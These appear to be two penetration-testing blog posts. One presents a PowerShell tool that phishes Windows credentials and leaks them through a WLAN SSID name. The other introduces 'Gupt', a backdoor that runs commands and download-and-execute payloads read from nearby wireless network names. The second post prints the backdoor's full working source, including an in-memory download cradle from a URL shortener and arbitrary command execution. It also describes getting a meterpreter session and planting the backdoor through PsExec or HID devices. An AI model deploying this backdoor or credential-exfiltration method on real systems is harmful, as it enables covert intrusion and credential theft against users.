Exfiltration of User Credentials using WLAN SSID

I was playing with Windows Hosted Network feature couple of days back. A hopefully useful idea which came to my mind was using the name of the hosted SSID for exfiltration. Since, SSID names support maximum 32 bytes the choice of data to exfiltrate is not really wide. Something like user credentials is small enough to fit in this limited space.

I wrote a PowerShell script which allows use to exfiltrate data using only SSID names. I give you Invoke-SSIDExfil.ps1. Here is the source code. This script provides for multiple options to exfiltrate data. Since, we are mostly after user credentials, the script uses logic from Invoke-CredentialsPhish to show a credentials prompt to the user to capture credentials in clear text. The captured credentials are then encoded using ROT13 (not going to call ROT13 encryption though that may be the technically correct term) and a Windows Hosted Network is created and started with SSID name set as to the encoded value in the form Domain:Username:Password. Below is the script in action. Please note that the script must be executed from an elevated shell:

PS C:\> Invoke-SSIDExfil -Verbose

And this is how  - if we are in physical proximity of the target - the SSID looks like:

Now, we can decode the user credentials using Invoke-SSIDExfil script's -Decode option.

Neat! From my past experience, such scripts are useful for impressive demonstrations.

The script can be used as a payload in targeted client side attacks, Human Interface Devices (Kautilya), authenticated command execution and other techniques.

Using the -StringToExfiltrate and -ExfilOnly parameters, it is also possible to exfiltrate a small piece of data without showing a credential prompt to the user.

An update to the Gupt-Backdoor

While working on this script, I revisited Gupt-Backdoor. That backdoor is quite impressive as well when it comes to demonstrations. I blogged about it here. An improvement to that backdoor has been added which allows to pass a one line PowerShell downloand and execute cradle for PowerShell v3 onwards. Also, ROT13 encoding has been implemented to make SSID names less suspicious. Below command can be used to start the backdoor on a target and tell that an encoded command will be provided to it:

PS C:\> Gupt-Backdoor -MagicString op3n -EncodedCmd -Verbose

And this is how a Wireless AP can be started to send instructions to the backdoor.

And the execution looks like below. The backdoor downloads and executes Get-WLAN-Keys from Nishang:

Small but useful improvements!

Hope you enjoyed the post! Please leave feedback and comments.

Introducing Gupt: A Backdoor which uses Wireless network names for command execution

Few weeks back, I was playing with my mobile WiFi hotspot and powershell. Using powershell, I was listing the SSIDs created by the mobile hotspot, wondering if it could be exploited some way? It turned out to be a yes but with some help.

Behold, I give you Gupt (which means secret), a powershell backdoor which could execute commands and scripts on a target if a specially crafted SSID is brought into its proximity. Gupt is very small yet powerful !

Like other backdoors, Gupt, a powershell script, has to be executed on the target. This could be done using Powershell Remoting and PsExec (needs crdentials of a user or hashes of built-in Administrator), with an exploit, using client side attacks (I will talk about these at DeepSec), using a Human Interface Device etc. Previous posts on this blog details above methods.

Executing Commands

Gupt checks all wireless network names for a pattern every 5 seconds, it asks for two parameters, first one, MagicString, is used to identify the SSID which contains commands for it. It needs to be four characters long. For example, if we set MagicString as "op3n", it would compare SSIDs of all available wireless networks if first four characters of any matches "op3n". Gupt needs the network name in a special format. While the first four characters must match MagicString, the 5th character is used to decide if we want it to execute a command or download-execute a powershell script.

If the 5th character is 'c', it means that rest of the network name is a command! For example, while looking for Wireless Networks, if Gupt encounters a network with name "op3ncwhoami" it would execute whoami on the target. Simple, isn't it? :)

Lets see it in action.We use the following:

PS C:\nishang> . .\Gupt-Backdoor.ps1
PS C:\nishang> Gupt-Backdoor -MagicString op3n -Verbose

Great! We executed command on the target without forcing it to connect to the wireless network. Lets have a look at the attacker's SSID/Network name.

As we saw, everything after the 'c' is considered a single command.
Lets see another example, this time with powershell cmdlet Get-Process. The SSID being "holacget-process"

Gupt waits for 10 seconds after executing a command, we can execute more commands by changing the SSID name.

Executing Scripts

Now, how do we execute a script using Gupt? Since maximum length for an SSID could only be 32 characters (with restrictions on special characters), passing scripts in SSID name is not possible. To achieve script execution, Gupt downloads and executes a script. If the 5th character of SSID is 'u', Gupt looks for the id part of a URL shortened by Google URL shortener. For example, a SSID "op3nunJEuug" would use http://goo.gl/nJEuug to download and execute the script. The script would be executed in memory. The second parameter, Arguments could be used to pass arguments to the downloaded script.

Lets see it in action with the Get-Information script from Nishang. We use the following command:

PS C:\nishang> . .\Gupt-Backdoor.ps1
PS C:\nishang> Gupt-Backdoor -MagicString op3n -Argument Get-Information -Verbose

Attacker's SSID being 'op3nunJEuug'
We could also execute Powerpreter module on a target using Gupt the same way, powerpreter would provide much wider functionality.

Lets see if we could get a meterpreter session with this. We will use the powershell script generated using msfpayload.

And we have a meterpreter.

This is how our SSIDs look like.

Cool!

Here is the full source code.

function Gupt-Backdoor
{
    [CmdletBinding()] Param(
        
        [Parameter(Position=0, Mandatory = $True)]
        [String]
        $MagicString,

        [Parameter(Position=3, Mandatory = $False)]
        [String]
        $Arguments
 
    )
    #Get list of available Wlan networks
    while($True)
    {
        Write-Verbose "Checking wireless networks for instructions."
        $networks = Invoke-Expression "netsh wlan show network"
        $ssid = $networks | Select-String "SSID"
        $NetworkNames = $ssid -replace ".*:" -replace " "
        ForEach ($network in $NetworkNames)
        {
            #Check if the first four characters of our SSID matches the given MagicString
            if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
            {
                Write-Verbose "Found a network with instructions!"
                #If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
                if ($network.Substring(4)[0] -eq "u")
                {
                    Write-Verbose "Downloading the attack script and executing it in memory."
                    $PayloadURL = "http://goo.gl/" + $network.Substring(5)
                    $webclient = New-Object System.Net.WebClient
                    Invoke-Expression $webclient.DownloadString($PayloadURL)
                    if ($Arguments)
                    {
                        Invoke-Expression $Arguments                   
                    }
                    Start-Sleep -Seconds 10
                }
                elseif ($network.Substring(4)[0] -eq "c")
                {
                    $cmd =  $network.Substring(5)
                    if ($cmd -eq "exit")
                    {
                        break
                    }
                    Write-Verbose "Command `"$cmd`" found. Executing it."
                    Invoke-Expression $cmd
                    Start-Sleep -Seconds 10
                }
            }
        }
        Start-Sleep -Seconds 5
    }
}

Gupt waits for 10 seconds after executing a script, we can execute more commands by changing the SSID name.

We ccold force Gupt to exit by naming our network, in above case, "op3ncexit".

Use cases of Gupt are many like bypassing network traffic monitoring, backdooring a machine completely on an internal network or simply to show off something new to the clients.

Gupt is available at github repo of Nishang and would soon be a part of Kautilya too.

If you like this post and presently in Europe and/or coming to DeepSec, Vienna, join me for interesting hands-on hacks, concepts and code in my two-day training "Powershell for Penetration Testers". Details here: https://deepsec.net/speaker.html#WSLOT145

Hope you enjoyed this. Please leave comments.